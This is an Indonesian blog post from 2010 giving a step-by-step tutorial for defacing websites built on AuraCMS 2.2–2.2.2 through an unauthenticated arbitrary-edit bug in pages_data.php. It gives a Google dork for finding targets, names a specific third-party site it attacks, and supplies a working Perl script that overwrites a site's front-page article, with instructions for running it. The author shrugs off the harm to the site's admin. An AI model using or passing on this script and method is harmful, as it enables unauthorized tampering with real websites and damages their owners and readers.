Senin, 29 Maret 2010

Deface Auracms 2.2

AuraCMS 2.2, 2.2.1, 2.2.2 Remote Exploit, Arbitrary Edit
=======================================================



Tulisan ini berisi tutorial bagaimana sebuah site yang berbasis AuraCMS 2.2 bisa kita exploit. Penyerangan yang dilakukan hanyalah sekedar mengubah isi tulisan dari suatu situs.

Bug ini terdapat pada file pages_data.php yang berlokasi di js/pages/pages_data.php. Bug ini ditemukan oleh k1tk4t, lihat keterangan lebih lengkapnya di :
  • http://Milw0rm.com/exploits/6033


    • -----

    Kita akan mencari situs target dengan Google. Dorknya : powered by AuraCMS 2.2

    Kita coba di salah satu situsnya...

    Untuk melihat apakah ada bug di pages_data.php-nya kita akan coba untuk mengakses berkas tersebut...

    Jika terdapat pesan error kurang lebih seperti ini :

    You Must Login First If Not Yet Have Account Please Register


    maka artinya pages_data.php-nya sudah dipatch sehingga kita tidak bisa mengakses sembarangan..

    Kita coba situs lain

    Kita coba di
  • http://harimansite.com/
    • yang memakai AuraCMS 2.2.2

    Cek pages_data.php-nya.

    Ternyata bisa kita akses... xixixixi....

    terlihat beberapa ID dari tulisan yang ada di situs ini. Di situs ini, tulisan dengan id nomor 1 adalah tulisan pembuka yang ada di halaman depan situs...

    Kita akan mencoba untuk mengubah tulisan tersebut

    Siapkan script Perl-nya. Kalian bisa menggunakan script perl di bawah :
    ============================================================
    use LWP::UserAgent;
    use HTTP::Cookies;
    use Getopt::Long;

    my $isijudul = "ISI JUDUL";
    my $isikonten = "Isi Konten";
    my $ambilkue = "http://situstarget.com/index.php";
    my $kue = HTTP::Cookies->new();
    my $hasil = "";
    my $browser = LWP::UserAgent->new;

    $arbitrary = "http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=";

    $hasil = $browser->get($arbitrary);

    $hasil = $browser->get($ambilkue);
    $kue->extract_cookies($hasil);
    $browser->cookie_jar($kue);

    $arbitrary .= "1";
    $hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
    $konten = $hasil->content;
    print $konten ;
    =============================================================


    Ubah variabel isijudul dan isikonten dengan tulisan yang kalian inginkan.

    Ganti situstarget.com dengan situs yang akan kalian serang. Disini saya akan menggantinya dengan
    http://harimansite.com/

    Karena ID tulisan yang akan kita ubah adalah nomor 1 maka biarkan saja angka di kode sebelah kanan ini...

    Save dengan nama exploit.pl di direktori yang sama di interpreter Perl.
    Secara default, interpreter Perl terletak di C:\Perl\Bin.

    Nah, jalankan command prompt. Bagi yang make Vista, jalankan dengan opsi Run as Administrator.

    Masuk ke direktori interpreter Perl.

    Jalankan exploit.pl dengan perintah : perl exploit.pl

    Kita kan cuma ngubah tulisan... jadi gak repotin Admin... Adminnya tinggal nulis lagi kok... :D

    Sekarang, mari refresh situsnya...

    BINGO... berubah tulisannya...

    xixixi....

    ------
    Thx for watching
    END
    Diposting oleh di

    Tidak ada komentar:

    Posting Komentar

    Apa yang anda Pikirkan dengan tulisan ini ???

    Langganan: Posting Komentar (Atom)